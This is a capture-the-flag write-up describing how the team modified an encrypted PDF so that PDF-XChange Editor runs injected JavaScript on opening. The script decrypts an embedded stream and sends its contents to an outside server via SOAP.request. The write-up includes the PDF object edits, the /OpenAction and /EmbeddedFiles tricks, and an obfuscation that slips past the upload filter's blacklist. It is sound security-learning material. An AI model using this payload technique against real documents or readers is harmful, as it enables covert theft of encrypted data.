# PDF-Xfiltration

> Try to steal data from Dr. Virus to understand what's happening to your brother.

The description also links to a webpage with a lengthy lore, but TLDR:
- we are given an encrypted PDF file,
- our task is to read it contents,
- we can upload a PDF file in a provided web app,
- the uploaded PDF will be opened by a bot in a PDF-XChange Editor in version 7.0.326.1.

First we looked at the PDF-XChange editor changelog at
https://www.tracker-software.com/product/pdf-xchange-editor/history and found our that the next version had a following
vulnerability fixed:

> The Editor, and our other products that work with XMP, are now not affected by the "Billion laughs attack".

The attached support board thread had a PoC attached with an XXE vulnerability in XMP metadata. We've tried with this
approach for a while, but it either didn't work or the upload webpage refused to accept our PDF file:

Error on upload: XXE attack attempt detected. This is not the right path.

We've even obfuscted the XML XMP metadata stream using a `/ASCIIHexDecode` filter, but guess what... **it wasn't the
right path**. It was even possible that the PDF password to the provided encrypted PDF wasn't stored in a filesystem, so
XXE approach wouldn't help us anyway.

Our next idea was to prepare a PDF file with an interactive text input and an attached script that would send us the
result. If the bot was programmed to input a password in a dialog and pressing [enter] that would possibly send us the
password. The form submit would display a warning and ask the user if it wants to send us the form, but we
reckoned that it might be automatically accepted when the bot would press [enter]. Sadly, it just didn't work.

Back to the drawing board... and a lot of Google searching, which fortunately was quite fruitful. We came upon a paper
describing, what basically is, a solution to our challenge: exfiltrating an encrypted content from a maliciously
modified PDF upon opening it.

We recommend everyone to read it in full: https://pdf-insecurity.org/download/paper-pdf_encryption-ccs2019.pdf. That's
some really cool research!

So the main issue with PDF encryption is that only parts of it are encrypted and the rest isn't authenticated at all. We
can modify all the unencrypted parts as we wish and even add our own, unencrypted objects. The idea is to add a custom
JavaScript code that upon opening and decrypting data would send it back to us.

The basic structure of a PDF file is that it consists of objects with their attributes and data in form of strings
and streams (binary data). Our provided PDF file looks like this:

1 0 obj
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog >>
2 0 obj
<< /CreationDate <5052dd9f3a4e02156dad8653cdaebd0ec9924e398fb069b7a68e1ed3cd9f75605d2a95540b770dd7919dd6ed943b1c77> /Producer <1c1a1e2d0766c0ecdfad3c10ce7deb030e3a69c2bcd4267ca67f9e681344e55159a02e86b7ef87678e7b2c12052acfdea82cd1f08237e293cdb84a4310a59a30> >>
3 0 obj
<< /Contents 5 0 R /MediaBox 6 0 R /Parent 4 0 R /Resources 7 0 R /Type /Page >>


5 0 obj
<< /Filter /FlateDecode /Length 272 >>
�?1@������l��W?���X�&]L=?~/� ... binary data ... ��}}?8�?�a�7�?��O?� 4?�<��8� �q��9�


9 0 obj
<< /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >> /Filter /Standard /Length 256 /O <c37e813188aee0710d84780cdbd8f5911de08ad42e126bd25c7333caf4540eddf5206f6a77d78ecad15e92cb7d1eefe2> /OE <47892a2defde16d7c57eb11f414f6da78f0464984b0e95cbc8d17a8c720b9fcd> /P -1028 /Perms <0169d0437c42dabefbcd653efced456b> /R 6 /StmF /StdCF /StrF /StdCF /U <3c9aa6a28f972b072f290ae4781ab76ae1335bcfd46dc00f1c4dd24e65ea8986e9179277232bfd7462c44640382f8a9b> /UE <6c3394663ab0ce631d011e61a7891f3da2e9c9bdc22a3dde8d1efd6db0c0ceec> /V 5 >>
0 10
0000000000 65535 f
0000000015 00000 n
0000000087 00000 n
0000000362 00000 n
0000000458 00000 n
0000000517 00000 n
0000000861 00000 n
0000000898 00000 n
0000001004 00000 n
0000001101 00000 n
trailer << /Info 2 0 R /Root 1 0 R /Size 10 /ID [<25577b924d52c40dabeb58264f356ef8><25577b924d52c40dabeb58264f356ef8>] /Encrypt 9 0 R >>

So we have 9 objects and one of them, the 5th one is a stream with some binary data. The trailer at the end of the file
is the first thing that PDF readers process. The most important thing is the `/Root 1 0 R` which tells the reader that
the document root is in the 1st object, and, in our case, the `/Encrypt 9 0 R` which tells us the document is encrypted
and the details are specified in the 9th object.

9 0 obj
<< /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >> /Filter /Standard /Length 256 /O <c37e813188aee0710d84780cdbd8f5911de08ad42e126bd25c7333caf4540eddf5206f6a77d78ecad15e92cb7d1eefe2> /OE <47892a2defde16d7c57eb11f414f6da78f0464984b0e95cbc8d17a8c720b9fcd> /P -1028 /Perms <0169d0437c42dabefbcd653efced456b> /R 6 /StmF /StdCF /StrF /StdCF /U <3c9aa6a28f972b072f290ae4781ab76ae1335bcfd46dc00f1c4dd24e65ea8986e9179277232bfd7462c44640382f8a9b> /UE <6c3394663ab0ce631d011e61a7891f3da2e9c9bdc22a3dde8d1efd6db0c0ceec> /V 5 >>

The attributes specify when the app should ask for a password, what the encryption algorithm is and its parameters
and whether it should consider that strings, streams and embedded files as encrypted or not. In our case, all of them
should be encrypted. That's not helpful, because we must add our JavaScript code and it has to be provided as either
string or a stream. As it turns out, both the PDF standard and different implementation quirks in various reader apps
allow us to have just that. In case of PDF-XChange Editor we can add a filter attribute to a stream specyfing that it
uses a special encryption algorithm: "Identity", so no encryption at all.

So let's add a new, unencrypted, object to our PDF file:

10 0 obj
<< /Filter [/Crypt] /DecodeParms [<< /Name /Identity >>]
/Length 25

That by itself isn't going to execute the JavaScript code. We need to add a reference to it in the catalog object.

So we change the 1st object from:

<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog >>


<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> >>

The added `/OpenAction` specifies we want to execute JavaScript code from the 10th object upon opening the document.

Now that we can execute our code, we need an exfiltration method. Existing research describes a few possible exfiltration
methods. Preferably we'd want a 0-click way to send a network request and after testing several approaches we find that
we can use `SOAP.request('http://server/', [])` to send an HTTP request without triggering any warnings or dialogs in the

We've submitted the PDF with these changes, and, voilà, soon we've noticed an incoming HTTP request. Great.

So how do we exfiltrate data from the now decrypted 5th stream? Again, there are several documented approaches.
At first, we've used the simplest and pure-JavaScript method using the `getPageNthWord()` function. We've got the
following request:

GET /Patient,Details,Name,Alfonso,Manfreso,DOB,03,15,1959,Gender,M,Patient,ID,15646548,Results,to,the,COVID,test,INS,PDF,NCrypt,0n,BYp,ss,Thr0uGh,D,r3ct,3xf1ltRat1oN?WSDL HTTP/1.1

We kinda see the flag there: `INS,PDF,NCrypt,0n,BYp,ss,Thr0uGh,D,r3ct,3xf1ltRat1oN`, but it's missing all of special
characters. We've tried to figure them out, but resigned after a few failed submissions.

We can't directly access streams from the JavaScript API, but we can define two types of objects: annotations and embedded files that:
- can be accessed from the JavaScript API,
- their contents can be pointed to another stream.

First we tried annotations, but we found that the upload form blocked all PDFs with the needed parameter keyword `/Annots`.
So we were left with embedded files. Once again we can add their definitions to the catalog.

We change it from the previously modified version of:
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> >>


<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> /Names << /EmbeddedFiles << /Names [(x) << /EF << /F 5 0 R >> >> ] >> >> >>

The added `/Names << /EmbeddedFiles << /Names [(x) << /EF << /F 5 0 R >> >> ] >>` specify an embedded file of name "x"
with contents of stream in 5th object.

It's content can be accessed in JavaScript with: `util.stringFromStream(this.getDataObjectContents("x",true));`.

Once again the upload form tried to annoy us with blacklisting the function name, but this time we've got several options
to obfuscate the code. The simplest `util.stringFromStream(this["getDat" + "aObje" + "ctContents"]("x",true))` did the work.

We sent the final payload and got the complete flag in the incoming HTTP request: `INS{PDF_#NCrypt!0n_BYp@ss_Thr0uGh_D/r3ct_3xf1ltRat1oN}`

The challenge would have been a lot easier if we'd also found PoCs attached with the original paper on PDF exfiltration,
but at least that forced us to learn a lot about PDF internals :).

[We also provide the complete Python script making the nessesary modifications](./kodzik.py) with the [original](./original.pdf) and [final](final.pdf) PDF files.

Original writeup (https://github.com/p4-team/ctf/tree/master/2022-01-29-insomnihack/pdf-xfiltration).